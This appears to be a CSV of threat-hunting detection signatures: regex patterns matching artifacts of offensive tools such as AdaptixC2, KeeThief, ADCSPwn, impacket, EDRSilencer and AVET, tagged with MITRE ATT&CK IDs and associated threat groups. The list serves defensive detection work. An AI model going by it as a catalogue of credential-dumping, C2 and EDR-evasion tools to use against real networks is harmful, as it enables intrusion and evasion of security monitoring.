"*Adaptix-Framework/AdaptixC2*",".{0,1000}Adaptix\-Framework\/AdaptixC2.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33242"
"*AdaptixServer -p*",".{0,1000}AdaptixServer\s\-p.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33243"
"*AdaptixServer/adaptixserver*",".{0,1000}AdaptixServer\/adaptixserver.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33244"
"*adbed7685fc512f48cf0edb1eb0df16fed97c52d5eab0fe70e88286c47d53e3d*",".{0,1000}adbed7685fc512f48cf0edb1eb0df16fed97c52d5eab0fe70e88286c47d53e3d.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33245"
"*ADCEEFBA-CE43-4239-8AE8-7D8D43E66BB1*",".{0,1000}ADCEEFBA\-CE43\-4239\-8AE8\-7D8D43E66BB1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","33247"
"*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33248"
"*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33249"
"*ADCollector3.csproj*",".{0,1000}ADCollector3\.csproj.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","33250"
"*adconnectdump.py*",".{0,1000}adconnectdump\.py.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33251"
"*adconnectdump-master*",".{0,1000}adconnectdump\-master.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33252"
"*ADCS Server location identified on IP *",".{0,1000}ADCS\sServer\slocation\sidentified\son\sIP\s.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","33253"
"*adcs_enum.*",".{0,1000}adcs_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33254"
"*adcs_enum_com.*",".{0,1000}adcs_enum_com\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33255"
"*adcs_enum_com2.*",".{0,1000}adcs_enum_com2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33256"
"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*",".{0,1000}ADCS_Maybe_ESC8_HTTPS_Vulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33257"
"*adcsattack.py*",".{0,1000}adcsattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33258"
"*ADCSCoercePotato.cpp*",".{0,1000}ADCSCoercePotato\.cpp.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33259"
"*ADCSCoercePotato.exe*",".{0,1000}ADCSCoercePotato\.exe.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33260"
"*ADCSCoercePotato.sln*",".{0,1000}ADCSCoercePotato\.sln.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33261"
"*ADCSCoercePotato.vcxproj*",".{0,1000}ADCSCoercePotato\.vcxproj.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33262"
"*ADCSCoercePotato\n- @decoder_it 2024\*",".{0,1000}ADCSCoercePotato\\n\-\s\@decoder_it\s2024\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33263"
"*adcshunter.py*",".{0,1000}adcshunter\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","33264"
"*adcskiller.py*",".{0,1000}adcskiller\.py.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","33265"
"*ADCSPwn.csproj*",".{0,1000}ADCSPwn\.csproj.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33266"
"*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33267"
"*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33268"
"*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33269"
"*ADCSPwn.sln*",".{0,1000}ADCSPwn\.sln.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33270"
"*ADCSPwn.zip*",".{0,1000}ADCSPwn\.zip.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33271"
"*ADCSPwn-master*",".{0,1000}ADCSPwn\-master.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33272"
"*adcsync.py -*",".{0,1000}adcsync\.py\s\-.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","33273"
"*Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sa\sspecific\sprocess.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","33274"
"*Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sall\sdetected\sEDR\sprocesses.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","33275"
"*add_evasion check_fast_forwarding*",".{0,1000}add_evasion\scheck_fast_forwarding.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33276"
"*add_evasion computation_fibonacci *",".{0,1000}add_evasion\scomputation_fibonacci\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33277"
"*add_evasion computation_timed_fibonacci*",".{0,1000}add_evasion\scomputation_timed_fibonacci.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33278"
"*add_evasion evasion_by_sleep *",".{0,1000}add_evasion\sevasion_by_sleep\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33279"
"*add_evasion fopen_sandbox_evasion*",".{0,1000}add_evasion\sfopen_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33280"
"*add_evasion get_bios_info*",".{0,1000}add_evasion\sget_bios_info.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33281"
"*add_evasion get_computer_domain *",".{0,1000}add_evasion\sget_computer_domain\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33282"
"*add_evasion get_cpu_cores *",".{0,1000}add_evasion\sget_cpu_cores\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33283"
"*add_evasion get_install_date *",".{0,1000}add_evasion\sget_install_date\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33284"
"*add_evasion get_num_processes*",".{0,1000}add_evasion\sget_num_processes.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33285"
"*add_evasion get_standard_browser *",".{0,1000}add_evasion\sget_standard_browser\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33286"
"*add_evasion get_tickcount*",".{0,1000}add_evasion\sget_tickcount.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33287"
"*add_evasion gethostbyname_sandbox_evasion*",".{0,1000}add_evasion\sgethostbyname_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33288"
"*add_evasion has_background_wp*",".{0,1000}add_evasion\shas_background_wp.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33289"
"*add_evasion has_folder *",".{0,1000}add_evasion\shas_folder\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33290"
"*add_evasion has_network_drive*",".{0,1000}add_evasion\shas_network_drive.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33291"
